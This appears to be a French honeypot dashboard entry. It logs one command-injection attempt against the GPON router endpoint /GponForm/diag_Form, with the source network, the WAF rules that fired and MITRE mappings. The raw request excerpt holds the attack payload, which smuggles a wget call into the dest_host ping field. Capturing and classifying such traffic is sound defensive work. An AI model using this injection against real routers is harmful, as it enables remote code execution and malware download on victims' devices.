Profil de menace
Activité suspecte — risque 93/100 (Critique) — MITRE T1059 — confiance 100 % — via HTTP
Activité suspecte — risque 93/100 (Critique) — MITRE T1059 — confiance 100 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance 100 % — Score WAF 100 · 7 tag(s) WAF
ASN 9541 · 103.18.14.0/24 · APNIC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 1 événements sur la période pour cette IP.
Même FAI Cyber Internet Services (Pvt) Ltd. — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
1 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
1 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /GponForm/diag_Form | Élevée | Critique · 93 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /GponForm/diag_Form UA Hello, World
Émulateur
HTTP
WAF
44
Recommandation
Bloquer (recommandé)
Tags
Cible HTTP
POST
/GponForm/diag_Form
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/GponForm/diag_Form
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Critique
· 93
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932190
CRS 932200
CRS 932205
CRS 932206
SSRF Localhost SSRF
Probe /GponForm/diag_Form
Ligne de requête
User-Agent
Hello, World
Règles WAF
rce-0
ssrf-2
ssrf-3
nosqli-3
cache-poison-host
dns-rebind
Payload (extrait)
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept:
Requête brute (extrait)
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World Content-Length: 118 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http:/ |
|||||||